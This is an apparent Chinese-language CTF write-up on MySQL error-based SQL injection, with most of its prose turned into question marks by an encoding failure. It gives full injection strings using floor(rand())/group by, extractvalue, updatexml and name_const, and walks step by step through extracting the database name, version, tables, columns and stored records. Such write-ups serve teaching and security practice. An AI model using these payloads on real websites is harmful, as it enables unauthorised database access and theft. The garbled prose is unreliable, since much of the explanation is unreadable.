???????????SQL???????
???????????? ???????[ 2015/6/9 11:58:04 ] ?????????????
???????????????ü???????????????1??????????ctf?????????????????here
???????????????????Щ???????????????????????????????????????£?P
????0x00 ??????????
???????????????????????????????sql????????sql????ì???????????????????????????????????е???????????????????????????????????????????????????????????????
????0x01 ???????????sql??????????????????mysql??????????????????????д?????????????????????
?????????? ???? rand() ?? group by ?????
???????????1???rand()??????group by ??mysql?е?????棬???????????????group by part of rand() returns duplicate key error???bug??
????RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
????You cannot use a column with RAND() values in an ORDER BY clause?? because ORDER BY would evaluate the column multiple times.
???????bug????duplicate key??????????????????????????P
?????????username=admin' and (select 1 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(?????????????sql???))x from information_schema.tables group by x )a) and '1' = '1
?????????? XPATH?????
??????????????????ExtractValue()??UpdateXML()??2????????????mysql 5.1????????????XML????????????????????????????????5.1?汾???
??????sql???
????????EXTRACTVALUE (XML_document?? XPath_string);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
??????????????XML?з???????????????????
??????:UPDATEXML (XML_document?? XPath_string?? new_value);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
????????????????new_value??String??????滻????????????????????
????????????????з?????????????
?????????????????????????????XPath_string(Xpath???)????????????????????????????32λ???????????mid?????
???????1??username=admin' and (extractvalue(1?? concat(0x7e??(?????????????sql???)))) and '1'='1
???????2??username=admin' and (updatexml(1?? concat(0x7e??(?????????????sql???))??1)) and '1'='1
??????????? ????б????????????????????????????????????????????????????????????????????????????????
???????????
????payload id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version??0))a+join+(select+name_const(@@version??0))b)c)
????0x02 ???
?????????????????????????????°????????????
????????????????????????????? ?????r0866cplushua
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select database()))x from information_schema.tables group by x )a) and '1' = '1
????????????????汾 ???:5.1.61-Alibaba-rds-201404-log
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select version()))x from information_schema.tables group by x )a) and '1' = '1
???????????????? ?????log motto user ???????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.tables where table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
?????????????????? ?????id username motto?????????????????user??????????????????????????????motto?????????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.columns where table_name='motto' and table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
??????????????? ?????key#notfound!# (???????????XPATH?????????????????????????????????????)
????username=admin%27%20and%20(extractvalue(1??%20concat(0x7e??(SELECT%20concat(username??0x3a??motto)%20FROM%20motto%20limit%203??1))))%20and%20%271%27=%271
?????????????????????????????????????????????????????????????·?????????лл????????????????????Щ??????????????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11